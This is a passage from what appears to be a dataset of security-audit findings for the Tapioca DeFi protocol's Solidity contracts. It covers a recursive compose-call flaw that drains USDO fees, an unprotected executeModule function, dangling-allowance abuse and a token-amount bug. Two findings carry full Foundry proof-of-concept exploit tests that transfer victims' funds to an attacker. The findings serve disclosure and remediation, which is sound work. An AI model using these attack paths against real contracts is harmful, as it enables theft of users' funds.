This will make it be kept along all the possible recursive calls that might take place:\\n```\\nfunction _remoteTransferReceiver(address _srcChainSender, bytes memory _data) internal virtual {\\n RemoteTransferMsg memory remoteTransferMsg_ = TapiocaOmnichainEngineCodec.decodeRemoteTransferMsg(_data);\\n\\n /// @dev xChain owner needs to have approved dst srcChain `sendPacket()` msg.sender in a previous composedMsg. Or be the same address.\\n _internalTransferWithAllowance(\\n remoteTransferMsg_.owner, _srcChainSender, remoteTransferMsg_.lzSendParam.sendParam.amountLD\\n ); \\n \\n // Make the internal transfer, burn the tokens from this contract and send them to the recipient on the other chain.\\n _internalRemoteTransferSendPacket(\\n// Remove the line below\\n remoteTransferMsg_.owner,\\n// Add the line below\\n _srcChainSender,\\n remoteTransferMsg_.lzSendParam, \\n remoteTransferMsg_.composeMsg \\n ); \\n \\n emit RemoteTransferReceived(\\n remoteTransferMsg_.owner,\\n remoteTransferMsg_.lzSendParam.sendParam.dstEid,\\n OFTMsgCodec.bytes32ToAddress(remoteTransferMsg_.lzSendParam.sendParam.to),\\n remoteTransferMsg_.lzSendParam.sendParam.amountLD\\n );\\n }\\n```\\nчHigh. An attacker can drain any USDO holder's balance and transfer it to themselves.ч```\\n// TapiocaOmnichainReceiver.sol\\nfunction lzCompose( \\n address _from,\\n bytes32 _guid,\\n bytes calldata _message,\\n address, //executor\\n bytes calldata //extra Data\\n ) external payable override {\\n // rest of code\\n \\n // Decode LZ compose message.\\n (address srcChainSender_, bytes memory oftComposeMsg_) =\\n TapiocaOmnichainEngineCodec.decodeLzComposeMsg(_message);\\n\\n // Execute the composed message. 
\\n _lzCompose(srcChainSender_, _guid, oftComposeMsg_); \\n }\\n```\\n -Recursive _lzCompose() call can be leveraged to steal all generated USDO feesчhighчIt is possible to steal all generated USDO fees by leveraging the recursive _lzCompose() call triggered in compose calls.\\nThe `USDOFlashloanHelper` contract allows users to take USDO flash loans. When a user takes a flash loan some fees will be enforced and transferred to the USDO contract:\\n```\\n// USDOFlashloanHelper.sol\\nfunction flashLoan(IERC3156FlashBorrower receiver, address token, uint256 amount, bytes calldata data)\\n external\\n override\\n returns (bool)\\n {\\n \\n // rest of code\\n\\n IERC20(address(usdo)).safeTransferFrom(address(receiver), address(usdo), fee);\\n \\n _flashloanEntered = false;\\n\\n return true;\\n }\\n```\\n\\nSuch fees can be later retrieved by the owner of the USDO contract via the `extractFees()` function:\\n```\\n// Usdo.sol\\nfunction extractFees() external onlyOwner { \\n if (_fees > 0) {\\n uint256 balance = balanceOf(address(this));\\n\\n uint256 toExtract = balance >= _fees ? _fees : balance;\\n _fees -= toExtract;\\n _transfer(address(this), msg.sender, toExtract);\\n }\\n }\\n```\\n\\nHowever, such fees can be stolen by an attacker by leveraging a wrong parameter set when performing a compose call.\\nWhen a compose call is triggered, the internal `_lzCompose()` call will be triggered. This call will check the `msgType_` and execute some logic according to the type of message requested. After executing the corresponding logic, it will be checked if there is an additional message by checking the `nextMsg_.length`. 
If the compose call had a next message to be called, a recursive call will be triggered and `_lzCompose()` will be called again:\\n```\\n// TapiocaOmnichainReceiver.sol\\n\\nfunction _lzCompose(address srcChainSender_, bytes32 _guid, bytes memory oftComposeMsg_) internal {\\n \\n // Decode OFT compose message.\\n (uint16 msgType_,,, bytes memory tapComposeMsg_, bytes memory nextMsg_) =\\n TapiocaOmnichainEngineCodec.decodeToeComposeMsg(oftComposeMsg_);\\n\\n // Call Permits/approvals if the msg type is a permit/approval.\\n // If the msg type is not a permit/approval, it will call the other receivers. \\n if (msgType_ == MSG_REMOTE_TRANSFER) { \\n _remoteTransferReceiver(srcChainSender_, tapComposeMsg_); \\n } else if (!_extExec(msgType_, tapComposeMsg_)) { \\n // Check if the TOE extender is set and the msg type is valid. If so, call the TOE extender to handle msg.\\n if ( \\n address(tapiocaOmnichainReceiveExtender) != address(0)\\n && tapiocaOmnichainReceiveExtender.isMsgTypeValid(msgType_)\\n ) { \\n bytes memory callData = abi.encodeWithSelector(\\n ITapiocaOmnichainReceiveExtender.toeComposeReceiver.selector,\\n msgType_,\\n srcChainSender_, \\n tapComposeMsg_\\n ); \\n (bool success, bytes memory returnData) =\\n address(tapiocaOmnichainReceiveExtender).delegatecall(callData);\\n if (!success) {\\n revert(_getTOEExtenderRevertMsg(returnData));\\n }\\n } else {\\n // If no TOE extender is set or msg type doesn't match extender, try to call the internal receiver.\\n if (!_toeComposeReceiver(msgType_, srcChainSender_, tapComposeMsg_)) {\\n revert InvalidMsgType(msgType_);\\n }\\n }\\n }\\n \\n emit ComposeReceived(msgType_, _guid, tapComposeMsg_);\\n if (nextMsg_.length > 0) {\\n _lzCompose(address(this), _guid, nextMsg_);\\n }\\n }\\n```\\n\\nAs we can see in the code snippet's last line, if `nextMsg_.length > 0` an additional compose call can be triggered . 
The problem with this call is that the first parameter in the `_lzCompose()` call is hardcoded to be `address(this)` (address of USDO), making the `srcChainSender_` become the USDO address in the recursive compose call.\\nAn attacker can then leverage the remote transfer logic in order to steal all the USDO tokens held in the USDO contract (mainly fees generated by flash loans).\\nForcing the recursive call to be a remote transfer, `_remoteTransferReceiver()` will be called. Because the source chain sender in the recursive call is the USDO contract, the `owner` parameter in the remote transfer (the address from which the remote transfer tokens are burnt) can also be set to the USDO address, making the allowance check in the `_internalTransferWithAllowance()` call be bypassed, and effectively burning a desired amount from USDO.\\n```\\n// USDO.sol\\nfunction _remoteTransferReceiver(address _srcChainSender, bytes memory _data) internal virtual {\\n RemoteTransferMsg memory remoteTransferMsg_ = TapiocaOmnichainEngineCodec.decodeRemoteTransferMsg(_data);\\n\\n \\n /// @dev xChain owner needs to have approved dst srcChain `sendPacket()` msg.sender in a previous composedMsg. Or be the same address.\\n _internalTransferWithAllowance(\\n remoteTransferMsg_.owner, _srcChainSender, remoteTransferMsg_.lzSendParam.sendParam.amountLD\\n ); \\n \\n // rest of code\\n }\\n\\nfunction _internalTransferWithAllowance(address _owner, address srcChainSender, uint256 _amount) internal {\\n \\n if (_owner != srcChainSender) { // <------- `_owner` and `srcChainSender` will both be the USDO address, so the check in `_spendAllowance()` won't be performed\\n _spendAllowance(_owner, srcChainSender, _amount);\\n }\\n \\n _transfer(_owner, address(this), _amount);\\n } \\n```\\n\\nAfter burning the tokens from USDO, the remote transfer will trigger a call to a destination chain to mint the burnt tokens in the origin chain. 
The receiver of the tokens can be different from the address whose tokens were burnt, so an attacker can obtain the minted tokens in the destination chain, effectively stealing all USDO balance from the USDO contract.\\nAn example attack path would be:\\nAn attacker creates a compose call from chain A to chain B. This compose call is actually composed of two messages:\\nThe first message, which won't affect the attack and is simply the initial step to trigger the attack in the destination chain\\nThe second message (nextMsg), which is the actual compose message that will trigger the remote transfer and burn the tokens in chain B, and finally trigger a call back to chain A to mint he tokens\\nThe call is executed, chain B receives the call and triggers the first compose message (as demonstrated in the PoC, this first message is not important and can simply be a remote transfer call with a 0 amount of tokens). After triggering the first compose call, the second compose message is triggered. The USDO contract is set as the source chain sender and the remote transfer is called. Because the owner set in the compose call and the source chain sender are the same, the specified tokens in the remote transfer are directly burnt\\nFinally, the compose call triggers a call back to chain A to mint the burnt tokens in chain B, and tokens are minted to the attacker\\n\\nThe following proof of concept illustrates how the mentioned attack can take place. 
In order to execute the PoC, the following steps must be performed:\\nCreate an `EnpointMock.sol` file inside the `test` folder inside `Tapioca-bar` and paste the following code (the current tests are too complex, this imitates LZ's endpoint contracts and reduces the poc's complexity):\\n```\\n// SPDX-License-Identifier: LZBL-1.2\\n\\npragma solidity ^0.8.20;\\n\\nstruct MessagingReceipt {\\n bytes32 guid;\\n uint64 nonce;\\n MessagingFee fee;\\n}\\n\\nstruct MessagingParams {\\n uint32 dstEid;\\n bytes32 receiver;\\n bytes message;\\n bytes options; \\n bool payInLzToken;\\n}\\n\\nstruct MessagingFee {\\n uint256 nativeFee;\\n uint256 lzTokenFee;\\n}\\ncontract MockEndpointV2 {\\n\\n \\n function send(\\n MessagingParams calldata _params,\\n address _refundAddress\\n ) external payable returns (MessagingReceipt memory receipt) {\\n // DO NOTHING\\n }\\n\\n /// @dev the Oapp sends the lzCompose message to the endpoint\\n /// @dev the composer MUST assert the sender because anyone can send compose msg with this function\\n /// @dev with the same GUID, the Oapp can send compose to multiple _composer at the same time\\n /// @dev authenticated by the msg.sender\\n /// @param _to the address which will receive the composed message\\n /// @param _guid the message guid\\n /// @param _message the message\\n function sendCompose(address _to, bytes32 _guid, uint16 _index, bytes calldata _message) external {\\n // DO NOTHING\\n \\n }\\n \\n}\\n```\\n\\nImport and deploy two mock endpoints in the `Usdo.t.sol` file\\nChange the inherited OApp in `Usdo.sol` 's implementation so that the endpoint variable is not immutable and add a `setEndpoint()` function so that the endpoint configured in `setUp()` can be chainged to the newly deployed endpoints\\nPaste the following test insde `Usdo.t.sol` :\\n```\\nfunction testVuln_USDOBorrowFeesCanBeDrained() public {\\n\\n // Change configured enpoints\\n\\n endpoints[aEid] = address(mockEndpointV2A);\\n endpoints[bEid] = 
address(mockEndpointV2B);\\n\\n aUsdo.setEndpoint(address(mockEndpointV2A));\\n bUsdo.setEndpoint(address(mockEndpointV2B));\\n\\n \\n // Mock generated fees\\n deal(address(bUsdo), address(bUsdo), 100 ether);\\n\\n ////////////////////////////////////////////////////////\\n // PREPARE MESSAGES //\\n ////////////////////////////////////////////////////////\\n\\n // NEXT MESSAGE B --> A (EXECUTED AS THE nextMsg after the INITIAL B --> A MESSAGE) \\n\\n SendParam memory sendParamAToBVictim = SendParam({\\n dstEid: aEid,\\n to: OFTMsgCodec.addressToBytes32(makeAddr(\"attacker\")),\\n amountLD: 100 ether, // IMPORTANT: This must be set to the amount we want to steal\\n minAmountLD: 100 ether,\\n extraOptions: bytes(\"\"),\\n composeMsg: bytes(\"\"),\\n oftCmd: bytes(\"\")\\n }); \\n MessagingFee memory feeAToBVictim = MessagingFee({\\n nativeFee: 0,\\n lzTokenFee: 0\\n });\\n \\n LZSendParam memory lzSendParamAToBVictim = LZSendParam({\\n sendParam: sendParamAToBVictim,\\n fee: feeAToBVictim,\\n extraOptions: bytes(\"\"),\\n refundAddress: makeAddr(\"attacker\")\\n });\\n\\n RemoteTransferMsg memory remoteTransferMsgVictim = RemoteTransferMsg({\\n owner: address(bUsdo), // IMPORTANT: This will make the attack be triggered as bUsdo will become the srcChainSender in the nextMsg compose call\\n composeMsg: bytes(\"\"),\\n lzSendParam: lzSendParamAToBVictim\\n });\\n\\n uint16 index; // needed to bypass Solidity's encoding literal error\\n // Create Toe Compose message for the victim\\n bytes memory toeComposeMsgVictim = abi.encodePacked(\\n PT_REMOTE_TRANSFER, // msgType\\n uint16(abi.encode(remoteTransferMsgVictim).length), // message length (0)\\n index, // index\\n abi.encode(remoteTransferMsgVictim), // message\\n bytes(\"\") // next message\\n );\\n \\n // SECOND MESSAGE (composed) B ---> A \\n // This second message is a necessary step in order to reach the execution\\n // inside `_lzCompose()` where the nextMsg can be triggered\\n\\n SendParam memory sendParamBToA 
= SendParam({\\n dstEid: aEid,\\n to: OFTMsgCodec.addressToBytes32(address(aUsdo)),\\n amountLD: 0, \\n minAmountLD: 0,\\n extraOptions: bytes(\"\"),\\n composeMsg: bytes(\"\"),\\n oftCmd: bytes(\"\")\\n }); \\n MessagingFee memory feeBToA = MessagingFee({\\n nativeFee: 0,\\n lzTokenFee: 0\\n });\\n \\n LZSendParam memory lzSendParamBToA = LZSendParam({\\n sendParam: sendParamBToA,\\n fee: feeBToA,\\n extraOptions: bytes(\"\"),\\n refundAddress: makeAddr(\"attacker\")\\n });\\n\\n // Create remote transfer message\\n RemoteTransferMsg memory remoteTransferMsg = RemoteTransferMsg({\\n owner: makeAddr(\"attacker\"),\\n composeMsg: bytes(\"\"),\\n lzSendParam: lzSendParamBToA\\n });\\n\\n // Create Toe Compose message\\n bytes memory toeComposeMsg = abi.encodePacked(\\n PT_REMOTE_TRANSFER, // msgType\\n uint16(abi.encode(remoteTransferMsg).length), // message length\\n index, // index\\n abi.encode(remoteTransferMsg),\\n toeComposeMsgVictim // next message: IMPORTANT to set this to the A --> B message that will be triggered as the `nextMsg`\\n );\\n \\n // INITIAL MESSAGE A ---> B \\n\\n // Create `_lzSendParam` parameter for `sendPacket()`\\n SendParam memory sendParamAToB = SendParam({\\n dstEid: bEid,\\n to: OFTMsgCodec.addressToBytes32(makeAddr(\"attacker\")), // address here doesn't matter\\n amountLD: 0,\\n minAmountLD: 0,\\n extraOptions: bytes(\"\"),\\n composeMsg: bytes(\"\"),\\n oftCmd: bytes(\"\")\\n }); \\n MessagingFee memory feeAToB = MessagingFee({\\n nativeFee: 0,\\n lzTokenFee: 0\\n });\\n \\n LZSendParam memory lzSendParamAToB = LZSendParam({\\n sendParam: sendParamAToB,\\n fee: feeAToB,\\n extraOptions: bytes(\"\"),\\n refundAddress: makeAddr(\"attacker\")\\n });\\n\\n vm.startPrank(makeAddr(\"attacker\"));\\n aUsdo.sendPacket(lzSendParamAToB, toeComposeMsg);\\n\\n // EXECUTE ATTACK\\n\\n // Execute first lzReceive() --> receive message in chain B\\n \\n vm.startPrank(endpoints[bEid]);\\n UsdoReceiver(address(bUsdo)).lzReceive(\\n Origin({sender: 
OFTMsgCodec.addressToBytes32(address(aUsdo)), srcEid: aEid, nonce: 0}), \\n OFTMsgCodec.addressToBytes32(address(0)), // guid (not needed for the PoC)\\n abi.encodePacked( // same as _buildOFTMsgAndOptions()\\n sendParamAToB.to,\\n index, // amount (use an initialized 0 variable due to Solidity restrictions)\\n OFTMsgCodec.addressToBytes32(makeAddr(\"attacker\")), // initially, the sender for the first A --> B message is the attacker\\n toeComposeMsg\\n ), // message\\n address(0), // executor (not used)\\n bytes(\"\") // extra data (not used)\\n );\\n\\n // Compose message is sent in `lzReceive()`, we need to trigger `lzCompose()`.\\n // bUsdo will be burnt from the bUSDO address, and nextMsg will be triggered to mint the burnt amount in chain A, having \\n // the attacker as the receiver\\n UsdoReceiver(address(bUsdo)).lzCompose(\\n address(bUsdo), \\n OFTMsgCodec.addressToBytes32(address(0)), // guid (not needed for the PoC)\\n abi.encodePacked(OFTMsgCodec.addressToBytes32(address(aUsdo)), toeComposeMsg), // message\\n address(0), // executor (not used)\\n bytes(\"\") // extra data (not used)\\n );\\n\\n vm.startPrank(endpoints[aEid]);\\n\\n // Receive nextMsg in chain A, mint tokens to the attacker\\n uint64 tokenAmountSD = usdoHelper.toSD(100 ether, aUsdo.decimalConversionRate());\\n\\n UsdoReceiver(address(aUsdo)).lzReceive(\\n Origin({sender: OFTMsgCodec.addressToBytes32(address(bUsdo)), srcEid: bEid, nonce: 0}), \\n OFTMsgCodec.addressToBytes32(address(0)), // guid (not needed for the PoC)\\n abi.encodePacked( // same as _buildOFTMsgAndOptions()\\n OFTMsgCodec.addressToBytes32(makeAddr(\"attacker\")),\\n tokenAmountSD\\n ), // message\\n address(0), // executor (not used)\\n bytes(\"\") // extra data (not used)\\n );\\n \\n\\n // Finished: bUSDO fees get drained, attacker obtains all the fees in the form of aUSDO\\n assertEq(bUsdo.balanceOf(address(bUsdo)), 0);\\n assertEq(aUsdo.balanceOf(makeAddr(\"attacker\")), 100 ether);\\n \\n }\\n```\\n\\nRun the poc 
with the following command: `forge test --mt testVuln_USDOBorrowFeesCanBeDrained`\\nThe proof of concept shows how in the end, USDO's `bUsdo` balance will become 0, while the same amount ofaUsdo in chain A will be minted to the attacker.чEnsure that the `_lzCompose()` call triggered when a `_nextMsg` exists keeps a consistent source chain sender address, instead of hardcoding it to `address(this)` :\\n```\\n// TapiocaOmnichainReceiver.sol\\n\\nfunction _lzCompose(address srcChainSender_, bytes32 _guid, bytes memory oftComposeMsg_) internal {\\n \\n // Decode OFT compose message.\\n (uint16 msgType_,,, bytes memory tapComposeMsg_, bytes memory nextMsg_) =\\n TapiocaOmnichainEngineCodec.decodeToeComposeMsg(oftComposeMsg_);\\n\\n // rest of code\\n \\n emit ComposeReceived(msgType_, _guid, tapComposeMsg_);\\n if (nextMsg_.length > 0) {\\n// Remove the line below\\n _lzCompose(address(this), _guid, nextMsg_);‚\\n// Add the line below\\n _lzCompose(srcChainSender_, _guid, nextMsg_);\\n }\\n }\\n```\\nчHigh, all fees generated by the USDO contract can be effectively stolen by the attackerч```\\n// USDOFlashloanHelper.sol\\nfunction flashLoan(IERC3156FlashBorrower receiver, address token, uint256 amount, bytes calldata data)\\n external\\n override\\n returns (bool)\\n {\\n \\n // rest of code\\n\\n IERC20(address(usdo)).safeTransferFrom(address(receiver), address(usdo), fee);\\n \\n _flashloanEntered = false;\\n\\n return true;\\n }\\n```\\n -Unprotected `executeModule` function allows to steal the tokensчhighчThe `executeModule` function allows anyone to execute any module with any params. That allows attacker to execute operations on behalf of other users.\\nHere is the `executeModule` function:\\nAll its parameters are controlled by the caller and anyone can be the caller. 
Anyone can execute any module on behalf of any user.\\nLet's try to steal someone's tokens using `UsdoMarketReceiver` module and `removeAssetReceiver` function (below is the PoC).\\nHere is the code that will call the `executeModule` function:\\n```\\nbUsdo.executeModule(\\n IUsdo.Module.UsdoMarketReceiver, \\n abi.encodeWithSelector(\\n UsdoMarketReceiverModule.removeAssetReceiver.selector, \\n marketMsg_), \\n false);\\n```\\n\\nThe important value here is the `marketMsg_` parameter. The `removeAssetReceiver` function forwards the call to `exitPositionAndRemoveCollateral` function via magnetar contract.\\nThe `exitPositionAndRemoveCollateral` function removes asset from Singularity market if the `data.removeAndRepayData.removeAssetFromSGL` is `true`. The amount is taken from `data.removeAndRepayData.removeAmount`. Then, if `data.removeAndRepayData.assetWithdrawData.withdraw` is `true`, the `_withdrawToChain` is called.\\nIn `_withdrawToChain`, if the `data.lzSendParams.sendParam.dstEid` is zero, the `_withdrawHere` is called that transfers asset to `data.lzSendParams.sendParam.to`.\\nSumming up, the following `marketMsg_` struct can be used to steal userB's assets from singularity market by `userA`.\\n```\\nMarketRemoveAssetMsg({\\n user: address(userB),//victim\\n externalData: ICommonExternalContracts({\\n magnetar: address(magnetar),\\n singularity: address(singularity),\\n bigBang: address(0),\\n marketHelper: address(marketHelper)\\n }),\\n removeAndRepayData: IRemoveAndRepay({\\n removeAssetFromSGL: true,//remove from Singularity market\\n removeAmount: tokenAmountSD,//amount to remove\\n repayAssetOnBB: false,\\n repayAmount: 0,\\n removeCollateralFromBB: false,\\n collateralAmount: 0,\\n exitData: IOptionsExitData({exit: false, target: address(0), oTAPTokenID: 0}),\\n unlockData: IOptionsUnlockData({unlock: false, target: address(0), tokenId: 0}),\\n assetWithdrawData: MagnetarWithdrawData({\\n withdraw: true,//withdraw assets\\n yieldBox: 
address(yieldBox), //where from to withdraw\\n assetId: bUsdoYieldBoxId, //what asset to withdraw\\n unwrap: false,\\n lzSendParams: LZSendParam({\\n refundAddress: address(userB),\\n fee: MessagingFee({lzTokenFee: 0, nativeFee: 0}),\\n extraOptions: \"0x\",\\n sendParam: SendParam({\\n amountLD: 0,\\n composeMsg: \"0x\",\\n dstEid: 0,\\n extraOptions: \"0x\",\\n minAmountLD: 0,\\n oftCmd: \"0x\",\\n to: OFTMsgCodec.addressToBytes32(address(userA)) // recipient of the assets\\n })\\n }),\\n sendGas: 0,\\n composeGas: 0,\\n sendVal: 0,\\n composeVal: 0,\\n composeMsg: \"0x\",\\n composeMsgType: 0\\n }),\\n collateralWithdrawData: MagnetarWithdrawData({\\n withdraw: false,\\n yieldBox: address(0),\\n assetId: 0,\\n unwrap: false,\\n lzSendParams: LZSendParam({\\n refundAddress: address(userB),\\n fee: MessagingFee({lzTokenFee: 0, nativeFee: 0}),\\n extraOptions: \"0x\",\\n sendParam: SendParam({\\n amountLD: 0,\\n composeMsg: \"0x\",\\n dstEid: 0,\\n extraOptions: \"0x\",\\n minAmountLD: 0,\\n oftCmd: \"0x\",\\n to: OFTMsgCodec.addressToBytes32(address(userB))\\n })\\n }),\\n sendGas: 0,\\n composeGas: 0,\\n sendVal: 0,\\n composeVal: 0,\\n composeMsg: \"0x\",\\n composeMsgType: 0\\n })\\n })\\n});\\n```\\n\\nHere is the modified version of the `test_market_remove_asset` test that achieves the same result, but with unauthorized call to `executeModule` function. 
The `userA` is the attacker, and `userB` is the victim.\\n```\\n function test_malicious_market_remove_asset() public {\\n uint256 erc20Amount_ = 1 ether;\\n\\n // setup\\n {\\n deal(address(bUsdo), address(userB), erc20Amount_);\\n\\n vm.startPrank(userB);\\n bUsdo.approve(address(yieldBox), type(uint256).max);\\n yieldBox.depositAsset(bUsdoYieldBoxId, address(userB), address(userB), erc20Amount_, 0);\\n\\n uint256 sh = yieldBox.toShare(bUsdoYieldBoxId, erc20Amount_, false);\\n yieldBox.setApprovalForAll(address(pearlmit), true);\\n pearlmit.approve(\\n address(yieldBox), bUsdoYieldBoxId, address(singularity), uint200(sh), uint48(block.timestamp + 1)\\n );\\n singularity.addAsset(address(userB), address(userB), false, sh);\\n vm.stopPrank();\\n }\\n\\n uint256 tokenAmount_ = 0.5 ether;\\n\\n /**\\n * Actions\\n */\\n uint256 tokenAmountSD = usdoHelper.toSD(tokenAmount_, aUsdo.decimalConversionRate());\\n\\n //approve magnetar\\n vm.startPrank(userB);\\n bUsdo.approve(address(magnetar), type(uint256).max);\\n singularity.approve(address(magnetar), type(uint256).max);\\n vm.stopPrank();\\n \\n MarketRemoveAssetMsg memory marketMsg = MarketRemoveAssetMsg({\\n user: address(userB),\\n externalData: ICommonExternalContracts({\\n magnetar: address(magnetar),\\n singularity: address(singularity),\\n bigBang: address(0),\\n marketHelper: address(marketHelper)\\n }),\\n removeAndRepayData: IRemoveAndRepay({\\n removeAssetFromSGL: true,\\n removeAmount: tokenAmountSD,\\n repayAssetOnBB: false,\\n repayAmount: 0,\\n removeCollateralFromBB: false,\\n collateralAmount: 0,\\n exitData: IOptionsExitData({exit: false, target: address(0), oTAPTokenID: 0}),\\n unlockData: IOptionsUnlockData({unlock: false, target: address(0), tokenId: 0}),\\n assetWithdrawData: MagnetarWithdrawData({\\n withdraw: true,\\n yieldBox: address(yieldBox),\\n assetId: bUsdoYieldBoxId,\\n unwrap: false,\\n lzSendParams: LZSendParam({\\n refundAddress: address(userB),\\n fee: MessagingFee({lzTokenFee: 0, 
nativeFee: 0}),\\n extraOptions: \"0x\",\\n sendParam: SendParam({\\n amountLD: 0,\\n composeMsg: \"0x\",\\n dstEid: 0,\\n extraOptions: \"0x\",\\n minAmountLD: 0,\\n oftCmd: \"0x\",\\n to: OFTMsgCodec.addressToBytes32(address(userA)) // transfer to attacker\\n })\\n }),\\n sendGas: 0,\\n composeGas: 0,\\n sendVal: 0,\\n composeVal: 0,\\n composeMsg: \"0x\",\\n composeMsgType: 0\\n }),\\n collateralWithdrawData: MagnetarWithdrawData({\\n withdraw: false,\\n yieldBox: address(0),\\n assetId: 0,\\n unwrap: false,\\n lzSendParams: LZSendParam({\\n refundAddress: address(userB),\\n fee: MessagingFee({lzTokenFee: 0, nativeFee: 0}),\\n extraOptions: \"0x\",\\n sendParam: SendParam({\\n amountLD: 0,\\n composeMsg: \"0x\",\\n dstEid: 0,\\n extraOptions: \"0x\",\\n minAmountLD: 0,\\n oftCmd: \"0x\",\\n to: OFTMsgCodec.addressToBytes32(address(userB))\\n })\\n }),\\n sendGas: 0,\\n composeGas: 0,\\n sendVal: 0,\\n composeVal: 0,\\n composeMsg: \"0x\",\\n composeMsgType: 0\\n })\\n })\\n });\\n bytes memory marketMsg_ = usdoHelper.buildMarketRemoveAssetMsg(marketMsg);\\n\\n\\n // I added _checkSender in MagnetarMock (function exitPositionAndRemoveCollateral) so need to whitelist USDO\\n cluster.updateContract(aEid, address(bUsdo), true);\\n\\n // ----- ADDED THIS ------>\\n // Attack using executeModule\\n // ------------------------\\n vm.startPrank(userA);\\n bUsdo.executeModule(\\n IUsdo.Module.UsdoMarketReceiver, \\n abi.encodeWithSelector(\\n UsdoMarketReceiverModule.removeAssetReceiver.selector, \\n marketMsg_), \\n false);\\n // ------------------------\\n\\n // Check execution\\n {\\n assertEq(bUsdo.balanceOf(address(userB)), 0);\\n assertEq(\\n yieldBox.toAmount(bUsdoYieldBoxId, yieldBox.balanceOf(address(userB), bUsdoYieldBoxId), false),\\n 0\\n );\\n assertEq(bUsdo.balanceOf(address(userA)), tokenAmount_);\\n }\\n }\\n```\\n\\nNote: The `burst` function was modified in the MagnetarMock contract and add call to `_checkSender` function to reproduce the real 
situation.\\nThat is also why the `bUsdo` has been whitelisted in the test.чThe `executeModule` function should inspect and validate the `_data` parameter to make sure that the caller is the same address as the user who executes the operations.чHIGH - Anyone can steal others' tokens from their markets.ч```\\nbUsdo.executeModule(\\n IUsdo.Module.UsdoMarketReceiver, \\n abi.encodeWithSelector(\\n UsdoMarketReceiverModule.removeAssetReceiver.selector, \\n marketMsg_), \\n false);\\n```\\n -Pending allowances can be exploitedчhighчPending allowances can be exploited in multiple places in the codebase.\\n`TOFT::marketRemoveCollateralReceiver` has the following flow:\\nIt calls `removeCollateral` on a market with the following parameters: `from = msg_user`, `to = msg_.removeParams.magnetar`.\\nInside the `SGLCollateral::removeCollateral` `_allowedBorrow` is called and checks if the `from = msg_user` address has given enough `allowanceBorrow` to the `msg.sender` which in this case is the TOFT contract.\\nSo for a user to use this flow it needs to call:\\n```\\nfunction approveBorrow(address spender, uint256 amount) external returns (bool) {\\n _approveBorrow(msg.sender, spender, amount);\\n return true;\\n }\\n```\\n\\nAnd give the needed allowance to the TOFT contract.\\nThis results in collateral being removed and transferred into the Magnetar contract with `yieldBox.transfer(address(this), to, collateralId, share);`.\\nThe Magnetar gets the collateral, and it can withdraw it to any address specified in the `msg_.withdrawParams`.\\nThis is problematic as the `TOFT::marketRemoveCollateralReceiver` doesn't check the `msg.sender`. 
In practice this means if Alice has called `approveBorrow` and gives the needed allowance with the intention of using the `marketRemoveCollateralReceiver` flow, Bob can use the `marketRemoveCollateralReceiver` flow and withdraw all the collateral from Alice to his address.\\nSo, any pending allowances from any user can immediately be exploited to steal the collateral.\\nOther occurrences\\nThere are a few other occurrences of this problematic pattern in the codebase.\\n`TOFT::marketBorrowReceiver` expects the user to give an approval to the Magnetar contract. The approval is expected inside the `_extractTokens` function where `pearlmit.transferFromERC20(_from, address(this), address(_token), _amount);` is called. Again, the `msg.sender` is not checked inside the `marketBorrowReceiver` function, so this flow can be abused by another user to borrow and withdraw the borrowed amount to his address.\\n`TOFT::mintLendXChainSGLXChainLockAndParticipateReceiver` also allows to borrow inside the BigBang market and withdraw the borrowed amount to an arbitrary address.\\n`TOF::exerciseOptionsReceiver` has the `_internalTransferWithAllowance` function that simply allows to transfer TOFT tokens from any `_options.from` address that has given an allowance to `srcChainSender`, by anyone that calls this function. It allows to forcefully call the `exerciseOptionsReceiver` on behalf of any other user.\\n`USDO::depositLendAndSendForLockingReceiver` also expects the user to give an allowance to the Magnetar contract, i.e. `MagnetarAssetXChainModule::depositYBLendSGLLockXchainTOLP` calls the `_extractTokens`.чThere are multiple instances of issues with dangling allowances in the protocol. 
Review all the allowance flows and make sure it can't be exploited.чThe impact of this vulnerability is that any pending allowances from any user can immediately be exploited to steal the collateral/borrowed amount.ч```\\nfunction approveBorrow(address spender, uint256 amount) external returns (bool) {\\n _approveBorrow(msg.sender, spender, amount);\\n return true;\\n }\\n```\\n -Incorrect `tapOft` Amounts Will Be Sent to Desired Chains on Certain ConditionsчmediumчTOFTOptionsReceiverModule::exerciseOptionsReceiver module, is responsible for facilitating users' token exercises between `mTOFT` and `tapOFT` tokens across different chains. In a `msg-type` where the user wishes to receive the `tapOFT` tokens on a different chain, the module attempts to ensure the amount sent to the user on the desired chain, aligns with the received tap amount in the current chain. However, a flaw exists where the computed amount to send is not updated in the send parameters, resulting in incorrect token transfer.\\nTOFTOptionsReceiverModule::exerciseOptionsReceiver module is a module that enables users to exercise their `mTOFT` tokens for a given amount of `tapOFT` option tokens.\\nWhen the user wishes to withdraw these `tapOft` tokens on a different chain, the withdrawOnOtherChain param will be set to true. For this composed call type, the contract attempts to ensure the amount to send to the user on the other chain isn't more than the received `tap amount`, by doing this:\\n```\\n uint256 amountToSend = _send.amountLD > _options.tapAmount ? 
_options.tapAmount : _send.amountLD;\\n if (_send.minAmountLD > amountToSend) {\\n _send.minAmountLD = amountToSend;\\n }\\n```\\n\\nThe issue here is that the computed amount to send is never updated in the `lzSendParams.sendParam`; the current code still goes on to send the packet to the destination chain with the default input amount:\\n```\\n if (msg_.withdrawOnOtherChain) {\\n /// @dev determine the right amount to send back to source\\n uint256 amountToSend = _send.amountLD > _options.tapAmount ? _options.tapAmount : _send.amountLD;\\n if (_send.minAmountLD > amountToSend) {\\n _send.minAmountLD = amountToSend;\\n }\\n\\n\\n // Sends to source and preserve source `msg.sender` (`from` in this case).\\n _sendPacket(msg_.lzSendParams, msg_.composeMsg, _options.from);\\n\\n\\n // Refund extra amounts\\n if (_options.tapAmount - amountToSend > 0) {\\n IERC20(tapOft).safeTransfer(_options.from, _options.tapAmount - amountToSend);\\n }\\n```\\n\\nTo illustrate:\\nassuming send `amountLD` = 100 and the user is to receive a tap amount of 80: since `amountLD` is greater than the tap amount, the amount to send should be 80, i.e. `msg_.lzSendParams.sendParam.amountLD` = 80. The current code goes on to send the default 100 to the user, when the user is only entitled to 80чUpdate the lz send param `amountLD` to the new computed `amountToSend` before sending the packet\\nI.e.:\\n```\\nmsg_.lzSendParams.sendParam.amountLD = amountToSend;\\n```\\n\\nNote that the issue should also be fixed in Tapioca-Bar as wellчThe user will always receive an incorrect amount of `tapOFT` in the desired chain whenever `amountLD` is greater than `tapAmount`ч```\\n uint256 amountToSend = _send.amountLD > _options.tapAmount ? 
